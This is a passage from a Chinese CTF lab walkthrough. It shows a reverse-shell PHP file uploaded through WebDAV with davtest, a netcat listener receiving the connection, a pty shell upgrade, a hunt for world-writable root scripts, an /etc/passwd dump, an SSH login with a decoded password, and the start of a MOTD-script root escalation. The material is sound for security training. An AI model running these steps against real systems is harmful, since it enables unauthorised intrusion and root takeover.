http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.php\n<\/code><\/pre>\n\n\n\n<p>\u901a\u8fc7\u4e0a\u56fe\u6211\u4eec\u53ef\u4ee5\u77e5\u9053\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u83b7\u53d6\u5230\u7684\u4fe1\u606f\u51ed\u8bc1\u5efa\u7acb\u4e00\u4e2aDAV\u8fde\u63a5\uff0c\u5e76\u4e14\u53ef\u4ee5\u5728\u9776\u673a\u4e0a\u521b\u5efa\u76ee\u5f55\u548c\u4e0a\u4f20\u6587\u4ef6\uff0c\u800c\u4e0a\u4f20\u5230\u4e0a\u9762\u7684\u6587\u4ef6\u53ea\u6709txt\uff0cphp\uff0chtml\u4e09\u79cd\u683c\u5f0f\u7684\u6587\u4ef6\u53ef\u4ee5\u88ab\u6267\u884c\uff0c\u90a3\u4e48\u5230\u8fd9\u91cc\u6211\u4eecgetshell\u7684\u601d\u8def\u5c31\u6709\u4e86\uff0c \u76f4\u63a5\u4f20\u4e00\u4e2a\u53cd\u5f39shell\u7684php\u6587\u4ef6\uff0c\u7136\u540ekali\u76d1\u542c\u672c\u5730\u7aef\u53e3\uff0c\u7136\u540e\u8bbf\u95ee\u8fd9\u4e2a\u6587\u4ef6\uff0c\u89e6\u53d1\u6267\u884c\u5373\u53efgetshell\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-206.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"880\" height=\"265\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-206.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-493\"  sizes=\"auto, (max-width: 880px) 100vw, 880px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>cp \/usr\/share\/webshells\/php\/php-reverse-shell.php .         #\u5c06kali\u81ea\u5e26\u53cd\u5f39shell\u6587\u4ef6\u62f7\u8d1d\u5230\u5f53\u524d\u76ee\u5f55\nvim php-reverse-shell.php                                   #\u7f16\u8f91\u8fd9\u4e2a\u6587\u4ef6\uff0c\u5c06ip\u6539\u4e3akali\u7684ip \u7aef\u53e3\u6539\u4e3akali\u7684\u7aef\u53e3<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-207.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"847\" height=\"731\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-207.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-494\"  sizes=\"auto, (max-width: 847px) 100vw, 847px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-208.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"101\" height=\"109\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-208.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-495\"\/><\/div><\/figure>\n\n\n\n<p>davtest -url <a href=\"http:\/\/192.168.11.136\/webdav\">http:\/\/192.168.11.136\/webdav<\/a> -auth yamdoot:Swarg -uploadfile php-reverse-shell.php -uploadloc rev.php<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-209.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"957\" height=\"320\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-209.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-496\"  sizes=\"auto, (max-width: 957px) 100vw, 957px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(root\u327fkali)-&#91;~\/\u684c\u9762]\n\u2514\u2500# davtest -url http:\/\/192.168.11.136\/webdav -auth yamdoot:Swarg -uploadfile php-reverse-shell.php  -uploadloc rev.php\n********************************************************\n Testing DAV connection\nOPEN            SUCCEED:                http:\/\/192.168.11.136\/webdav\n********************************************************\n unless  Uploading file\nUpload succeeded: http:\/\/192.168.11.136\/webdav\/rev.php\n<\/code><\/pre>\n\n\n\n<p>\u901a\u8fc7\u4e0a\u56fe\u53ef\u4ee5\u770b\u5230\uff0c\u6211\u4eec\u5df2\u7ecf\u6210\u529f\u5c06\u53cd\u5f39shell\u7684\u6587\u4ef6\u4e0a\u4f20\u5230\u4e86\u9776\u673a\u4e0a\uff0c\u63a5\u4e0b\u6765kali\u76d1\u542c\u672c\u5730\u7aef\u53e3\uff0c\u7136\u540e\u8bbf\u95ee\u8fd9\u4e2a\u6587\u4ef6\uff0c\u89e6\u53d1\u6267\u884c\u5373\u53efgetshell\u3002<\/p>\n\n\n\n<p>nc -lnvp 1234 #kali\u76d1\u542c4444\u7aef\u53e3<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-210.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"966\" height=\"194\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-210.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-497\"  sizes=\"auto, (max-width: 966px) 100vw, 966px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>\n\u250c\u2500\u2500(root\u327fkali)-&#91;~\/\u684c\u9762]\n\u2514\u2500# nc -lnvp 1234         \nlistening on &#91;any] 1234 ...\nconnect to &#91;192.168.11.128] from (UNKNOWN) &#91;192.168.11.136] 57528\nLinux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 x86_64 x86_64 GNU\/Linux\n 19:50:47 up 46 min,  0 users,  load average: 0.00, 0.00, 0.00\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\/bin\/sh: 0: can't access tty; job control turned off\n$ \n<\/code><\/pre>\n\n\n\n<p><a href=\"http:\/\/192.168.11.136\/webdav\/rev.php\">http:\/\/192.168.11.136\/webdav\/rev.php<\/a> #\u8bbf\u95ee\u8be5\u94fe\u63a5\u89e6\u53d1\u6267\u884c\u53cd\u5f39shell\u7684\u4ee3\u7801<\/p>\n\n\n\n<p>python3 -c &#8220;import pty;pty.spawn(&#8216;\/bin\/bash&#8217;)&#8221; #\u5347\u7ea7\u4f18\u5316\u4e00\u4e0bshell<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-211.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"922\" height=\"205\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-211.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-498\"  sizes=\"auto, (max-width: 922px) 100vw, 922px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>MOTD\u6ce8\u5165\u63d0\u6743<\/strong><\/h2>\n\n\n\n<p>\u63a5\u4e0b\u6765\u6211\u4eec\u901a\u8fc7\u4e0b\u9762\u8fd9\u6761\u547d\u4ee4\u627e\u4e00\u4e9b\u5c5e\u4e3b\u662froot \u666e\u901a\u7528\u6237\u6216\u7ec4\u53ef\u6267\u884c \u5176\u4ed6\u7528\u6237\u53ef\u5199\u7684\u6587\u4ef6\uff0c\u8fd9\u79cd\u6587\u4ef6\u5f80\u5f80\u53ef\u4ee5\u5e2e\u52a9\u6211\u4eec\u5b9e\u73b0\u6743\u9650\u63d0\u5347\u3002<\/p>\n\n\n\n<p>find \/ -type f -user root -perm -ug=x,o=w -exec ls -l &#8216;{}&#8217; ; 2&gt;\/dev\/null<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u547d\u4ee4\u89e3\u91ca\uff1a<\/h1>\n\n\n\n<p>\u4ece\u6839\u76ee\u5f55\u4e0b\u5f00\u59cb\u67e5\u627e \u6587\u4ef6\u7c7b\u578b \u5c5e\u4e3b\u662froot \u666e\u901a\u7528\u6237\u6216\u7ec4\u53ef\u6267\u884c \u5176\u4ed6\u7528\u6237\u53ef\u5199 \u5982\u679c\u53d1\u73b0\u4e86\u7b26\u5408\u6761\u4ef6\u7684\u7528 ls -l\u547d\u4ee4\u663e\u793a \u9519\u8bef\u4fe1\u606f\u4ece\u5b9a\u5411\u5230null<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-212.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1010\" height=\"270\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-212.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-499\"  sizes=\"auto, (max-width: 1010px) 100vw, 1010px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>www-data@ubuntu:\/$ find \/ -type f -user root -perm -ug=x,o=w -exec ls -l '{}' ; 2&gt;\/dev\/null\n\n#\u547d\u4ee4\u89e3\u91ca\uff1a\n\u4ece\u6839\u76ee\u5f55\u4e0b\u5f00\u59cb\u67e5\u627e \u6587\u4ef6\u7c7b\u578b \u5c5e\u4e3b\u662froot \u666e\u901a\u7528\u6237\u6216\u7ec4\u53ef\u6267\u884c \u5176\u4ed6\u7528\u6237\u53ef\u5199  \u5982\u679c\u53d1\u73b0\u4e86\u7b26\u5408\u6761\u4ef6\u7684\u7528 ls -l\u547d\u4ee4\u663e\u793a  \u9519\u8bef&lt;oot -perm -ug=x,o=w -exec ls -l '{}' ; 2&gt;\/dev\/null\n-rwxrwxrwx 1 root root 124 Sep 22  2020 \/mnt\/hell.sh\n-rwxrwxrwx 1 root root 299 May 18  2017 \/etc\/update-motd.d\/91-release-upgrade\n-rwxrwxrwx 1 root root 1220 Apr  9  2018 \/etc\/update-motd.d\/00-header\n-rwxrwxrwx 1 root root 4251 Apr  9  2018 \/etc\/update-motd.d\/50-motd-news\n-rwxrwxrwx 1 root root 604 Mar 21  2018 \/etc\/update-motd.d\/80-esm\n-rwxrwxrwx 1 root root 3017 Mar 21  2018 \/etc\/update-motd.d\/80-livepatch\n-rwxrwxrwx 1 root root 1157 Apr  9  2018 \/etc\/update-motd.d\/10-help-text\nwww-data@ubuntu:\/$  \nwww-data@ubuntu:\/$ #\u547d\u4ee4\u89e3\u91ca\uff1a<\/code><\/pre>\n\n\n\n<p>\u5148cat\u4e86\u4e00\u4e0b\u641c\u7d22\u5230\u7684\u7b2c\u4e00\u4e2a\u6587\u4ef6\uff0c\u53d1\u73b0\u91cc\u9762\u6709brainfuck\u52a0\u5bc6\u7684\u5185\u5bb9\uff0c\u6240\u4ee5\u5c1d\u8bd5\u89e3\u5bc6\u4e0b\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-213.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"746\" height=\"135\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-213.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-500\"  sizes=\"auto, (max-width: 746px) 100vw, 746px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>--&#91;-----&gt;+&lt;]&gt;---.+++++.+.+++++++++++.--.+++&#91;-&gt;+++&lt;]&gt;++.++++++.--&#91;---&gt;+&lt;]&gt;--.-----.++++.<\/code><\/pre>\n\n\n\n<p>Brain Fuck\u89e3\u7801\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-214-1024x750.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"750\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-214-1024x750.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-501\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u5bc6\u7801\uff1achitragupt<\/p>\n\n\n\n<p>\u89e3\u5bc6\u5f97\u5230\u7684\u8fd9\u4e2a\u53ef\u80fd\u662f\u67d0\u4e2a\u7528\u6237\u7684\u5bc6\u7801\uff0c\u6240\u4ee5\u6839\u636e\u67e5\u770b\/etc\/passwd\u6587\u4ef6\u53d1\u73b0\u7684\u7528\u6237\uff0c\u6328\u4e2a\u5c1d\u8bd5\u4e0b\u3002<\/p>\n\n\n\n<p>cat \/etc\/passwd \u8fd9\u4e2a\u8bb0\u5f55\u4e86\u6240\u4ee5\u7528\u6237\u7684\u90fd\u5177\u6709\u4ec0\u4e48\u6743\u9650<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-215.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"834\" height=\"520\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-215.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-502\"  sizes=\"auto, (max-width: 834px) 100vw, 834px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>www-data@ubuntu:\/$ cat \/etc\/passwd\ncat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:\/run\/systemd\/netif:\/usr\/sbin\/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:\/run\/systemd\/resolve:\/usr\/sbin\/nologin\nsyslog:x:102:106::\/home\/syslog:\/usr\/sbin\/nologin\nmessagebus:x:103:107::\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:104:65534::\/nonexistent:\/usr\/sbin\/nologin\nuuidd:x:105:109::\/run\/uuidd:\/usr\/sbin\/nologin\nnarak:x:1000:1000:narak,,,:\/home\/narak:\/bin\/bash\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nyamdoot:x:1001:1001:,,,:\/home\/yamdoot:\/bin\/bash\ninferno:x:1002:1002:,,,:\/home\/inferno:\/bin\/bash\n<\/code><\/pre>\n\n\n\n<p>inferno \u6700\u540e\u662f\u8fd9\u4e2a\u7528\u6237<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-216.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"772\" height=\"471\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-216.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-503\"  sizes=\"auto, (max-width: 772px) 100vw, 772px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(root\u327fkali)-&#91;~\/\u684c\u9762]\n\u2514\u2500# ssh inferno@192.168.11.136\nThe authenticity of host '192.168.11.136 (192.168.11.136)' can't be established.\nED25519 key fingerprint is SHA256:A4qSwLMJMXo\/YuhKxw\/H\/4ezPo8GmE3SuuMQr98X7TU.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/&#91;fingerprint])? y\nPlease type 'yes', 'no' or the fingerprint: y\nPlease type 'yes', 'no' or the fingerprint: y\nPlease type 'yes', 'no' or the fingerprint: n\nPlease type 'yes', 'no' or the fingerprint: yes\nWarning: Permanently added '192.168.11.136' (ED25519) to the list of known hosts.\ninferno@192.168.11.136's password: \nWelcome to Ubuntu 18.04 LTS (GNU\/Linux 4.15.0-20-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\nThe programs included with the Ubuntu system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nUbuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by\napplicable law.\n\ninferno@ubuntu:~$ \n<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u5f97\u5230flag1<\/h2>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-217.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"610\" height=\"309\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-217.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-504\"  sizes=\"auto, (max-width: 610px) 100vw, 610px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>inferno@ubuntu:~$ cat user.txt\nFlag: {5f95bf06ce19af69bfa5e53f797ce6e2} \n<\/code><\/pre>\n\n\n\n<p>\u65e2\u7136\u5df2\u7ecf\u83b7\u53d6\u5230\u4e86inferno\u7528\u6237\u7684\u5bc6\u7801\uff0c\u6211\u63a5\u4e0b\u6765\u5c1d\u8bd5\u4f7f\u7528ssh\u767b\u5f55\u5230inferno\u7528\u6237\u4e0a\u3002<\/p>\n\n\n\n<p>\u6211\u89c2\u5bdf\u5230\u9664\u4e86\u6211\u4eec\u521a\u521a\u53d1\u73b0\u5bc6\u7801\u7684\u90a3\u4e2a\u6587\u4ef6\uff0c\u5176\u4ed6\u6587\u4ef6\u90fd\u5728\/etc\/update-motd.d\/\u8fd9\u4e2a\u76ee\u5f55\u4e0b\uff0cmotd\u662fmessage of the day\u8fd9\u53e5\u8bdd\u7684\u7f29\u5199\uff0c\u6211\u4eec\u901a\u8fc7ssh\u767b\u5f55\u6210\u529f\u540e\u770b\u5230\u7684\u90a3\u4e9b\u6b22\u8fce\u548c\u63d0\u793a\u7684\u4fe1\u606f\u90fd\u662fmotd\u76ee\u5f55\u4e0b\u5b58\u653e\u7684\u8fd9\u4e9bsh\u811a\u672c\u6240\u63d0\u4f9b\u7684\u3002<\/p>\n\n\n\n<p>\u90a3\u4e48\u73b0\u5728\u6211\u4eec\u77e5\u9053\u4e86\uff0c\u5f53\u6211\u4eec\u901a\u8fc7ssh\u767b\u5f55\u6210\u529f\u7684\u65f6\u5019\uff0c\u8fd9\u4e9bsh\u811a\u672c\u4f1a\u4ee5root\u6743\u9650\u8fd0\u884c\u8f93\u51fa\u90a3\u4e9b\u6b22\u8fce\u4fe1\u606f\u548c\u65e5\u671f\u7b49\u7b49\uff0c\u5e76\u4e14\u6211\u4eec\u5f53\u524d\u8fd9\u4e2a\u7528\u6237\u5bf9\u8fd9\u4e9b\u6587\u4ef6\u53ef\u8bfb\u53ef\u5199\uff0c\u90a3\u4e48\u63d0\u6743\u601d\u8def\u5c31\u6709\u4e86\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u5728\u8fd9\u4e9bsh\u811a\u672c\u4e2d\u5199\u5165\u4e00\u4e2a\u4fee\u6539root\u7528\u6237\u5bc6\u7801\u7684\u547d\u4ee4\uff0c\u8fd9\u6837\u5f53\u6211\u4eec\u901a\u8fc7ssh\u7528\u6237\u767b\u5f55\u5230inferno\u8f